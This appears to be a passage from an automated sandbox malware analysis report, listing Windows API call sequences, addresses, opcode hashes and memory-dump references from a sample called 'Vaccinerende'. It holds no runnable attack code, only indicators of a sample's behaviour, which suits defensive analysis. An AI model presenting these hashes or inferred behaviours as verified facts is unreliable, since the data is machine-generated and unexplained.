                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memcpy
                                            • String ID: @
                                            • API String ID: 3510742995-2766056989
                                            • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                            • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                            • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                            • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                            APIs
                                            • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF07
                                            • memset.MSVCRT ref: 0040AF18
                                            • memcpy.MSVCRT(0045A474,?,00000000,00000000,00000000,00000000,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
                                            • ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: ??2@??3@memcpymemset
                                            • String ID:
                                            • API String ID: 1865533344-0
                                            • Opcode ID: ae038b71f9c71a492fbd9ead760fad2983a0a3722d1a889603b093681f778c61
                                            • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                            • Opcode Fuzzy Hash: ae038b71f9c71a492fbd9ead760fad2983a0a3722d1a889603b093681f778c61
                                            • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                            APIs
                                            • memset.MSVCRT ref: 004144E7
                                              • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                              • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                            • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                            • memset.MSVCRT ref: 0041451A
                                            • GetPrivateProfileStringW.KERNEL32(?,?,Function_0004E518,?,00002000,?), ref: 0041453C
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                            • String ID:
                                            • API String ID: 1127616056-0
                                            • Opcode ID: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                                            • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                            • Opcode Fuzzy Hash: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                                            • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                            APIs
                                            • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
                                            • memset.MSVCRT ref: 0042FED3
                                            • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memcpy$memset
                                            • String ID: sqlite_master
                                            • API String ID: 438689982-3163232059
                                            • Opcode ID: ffda2190085ae9c3ce841de5d9405e2beeaf844ff5ba4b6923ab4bebb0b5ba17
                                            • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                            • Opcode Fuzzy Hash: ffda2190085ae9c3ce841de5d9405e2beeaf844ff5ba4b6923ab4bebb0b5ba17
                                            • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                            APIs
                                            • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                            • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                            • wcscpy.MSVCRT ref: 00414DF3
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: BrowseFolderFromListMallocPathwcscpy
                                            • String ID:
                                            • API String ID: 3917621476-0
                                            • Opcode ID: e1f0fba32f57733aa2e62750ac03032e5e1fd264973d7f61484481ae59376fd7
                                            • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                            • Opcode Fuzzy Hash: e1f0fba32f57733aa2e62750ac03032e5e1fd264973d7f61484481ae59376fd7
                                            • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                            APIs
                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                              • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                              • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                            • _snwprintf.MSVCRT ref: 00410FE1
                                            • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                              • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                              • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                            • _snwprintf.MSVCRT ref: 0041100C
                                            • wcscat.MSVCRT ref: 0041101F
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                            • String ID:
                                            • API String ID: 822687973-0
                                            • Opcode ID: 13244a37e27c3892f350f60725bb78b4c5ec5d087451c120d8dd0baf8caf14ec
                                            • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                            • Opcode Fuzzy Hash: 13244a37e27c3892f350f60725bb78b4c5ec5d087451c120d8dd0baf8caf14ec
                                            • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                            APIs
                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74DEDF80,?,0041755F,?), ref: 00417452
                                            • malloc.MSVCRT ref: 00417459
                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,74DEDF80,?,0041755F,?), ref: 00417478
                                            • free.MSVCRT ref: 0041747F
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: ByteCharMultiWide$freemalloc
                                            • String ID:
                                            • API String ID: 2605342592-0
                                            • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                            • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                            • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                            • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                            APIs
                                            • GetModuleHandleW.KERNEL32(00000000,?,00000000), ref: 00412403
                                            • RegisterClassW.USER32(00000001), ref: 00412428
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                            • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000,?), ref: 00412455
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: HandleModule$ClassCreateRegisterWindow
                                            • String ID:
                                            • API String ID: 2678498856-0
                                            • Opcode ID: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
                                            • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                            • Opcode Fuzzy Hash: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
                                            • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                            APIs
                                            • GetDlgItem.USER32(?,?), ref: 00409B40
                                            • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                            • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                            • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: MessageSend$Item
                                            • String ID:
                                            • API String ID: 3888421826-0
                                            • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                            • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                            • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                            • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                            APIs
                                            • memset.MSVCRT ref: 00417B7B
                                            • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                            • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                            • GetLastError.KERNEL32 ref: 00417BB5
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: File$ErrorLastLockUnlockmemset
                                            • String ID:
                                            • API String ID: 3727323765-0
                                            • Opcode ID: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
                                            • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                            • Opcode Fuzzy Hash: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
                                            • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                            APIs
                                            • memset.MSVCRT ref: 0040F673
                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00007FFF,00000000,00000000,00000000), ref: 0040F690
                                            • strlen.MSVCRT ref: 0040F6A2
                                            • WriteFile.KERNEL32(00000001,?,00000000,00000000,00000000), ref: 0040F6B3
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: ByteCharFileMultiWideWritememsetstrlen
                                            • String ID:
                                            • API String ID: 2754987064-0
                                            • Opcode ID: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                                            • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                            • Opcode Fuzzy Hash: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                                            • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                            APIs
                                            • memset.MSVCRT ref: 0040F6E2
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000001,000000FF,?,00001FFF,00000000,00000000,00000001,0044E5FC,00000000,00000000,00000000,?,00000000,00000000), ref: 0040F6FB
                                            • strlen.MSVCRT ref: 0040F70D
                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040F71E
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: ByteCharFileMultiWideWritememsetstrlen
                                            • String ID:
                                            • API String ID: 2754987064-0
                                            • Opcode ID: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                                            • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                            • Opcode Fuzzy Hash: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                                            • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                            APIs
                                            • memset.MSVCRT ref: 00402FD7
                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                            • strlen.MSVCRT ref: 00403006
                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: ByteCharFileMultiWideWritememsetstrlen
                                            • String ID:
                                            • API String ID: 2754987064-0
                                            • Opcode ID: 45553c8af4b0363f8a34df7fc8c3d36c1e5ddbe80f4e11049bb1cff45e3a7899
                                            • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                            • Opcode Fuzzy Hash: 45553c8af4b0363f8a34df7fc8c3d36c1e5ddbe80f4e11049bb1cff45e3a7899
                                            • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                            APIs
                                              • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                              • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                              • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                            • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                            • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                            • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                            • GetStockObject.GDI32(00000000), ref: 004143C6
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                            • String ID:
                                            • API String ID: 764393265-0
                                            • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                            • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                            • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                            • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                            APIs
                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                            • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                            • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: Time$System$File$LocalSpecific
                                            • String ID:
                                            • API String ID: 979780441-0
                                            • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                            • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                            • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                            • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                            APIs
                                            • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                            • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                            • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memcpy$DialogHandleModuleParam
                                            • String ID:
                                            • API String ID: 1386444988-0
                                            • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                            • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                            • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                            • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                            APIs
                                            • ??3@YAXPAX@Z.MSVCRT(020B0048), ref: 0044DF01
                                            • ??3@YAXPAX@Z.MSVCRT(009072E0), ref: 0044DF11
                                            • ??3@YAXPAX@Z.MSVCRT(00907AF0), ref: 0044DF21
                                            • ??3@YAXPAX@Z.MSVCRT(009076E8), ref: 0044DF31
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: ??3@
                                            • String ID:
                                            • API String ID: 613200358-0
                                            • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                            • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                            • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                            • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                            APIs
                                            • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                            • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: InvalidateMessageRectSend
                                            • String ID: d=E
                                            • API String ID: 909852535-3703654223
                                            • Opcode ID: 4f85adb7d2e1d59cf2ea2def55f14199f34628ec472c317f77867e4e632b01ed
                                            • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                            • Opcode Fuzzy Hash: 4f85adb7d2e1d59cf2ea2def55f14199f34628ec472c317f77867e4e632b01ed
                                            • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                            APIs
                                            • wcschr.MSVCRT ref: 0040F79E
                                            • wcschr.MSVCRT ref: 0040F7AC
                                              • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                              • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4), ref: 0040AACB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: wcschr$memcpywcslen
                                            • String ID: "
                                            • API String ID: 1983396471-123907689
                                            • Opcode ID: 37fc4c0e45f0a8a54b588a11981c40142be0fe56f3c50330bf3b06fef0d62b23
                                            • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                            • Opcode Fuzzy Hash: 37fc4c0e45f0a8a54b588a11981c40142be0fe56f3c50330bf3b06fef0d62b23
                                            • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                            APIs
                                              • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                            • _memicmp.MSVCRT ref: 0040C00D
                                            • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: FilePointer_memicmpmemcpy
                                            • String ID: URL
                                            • API String ID: 2108176848-3574463123
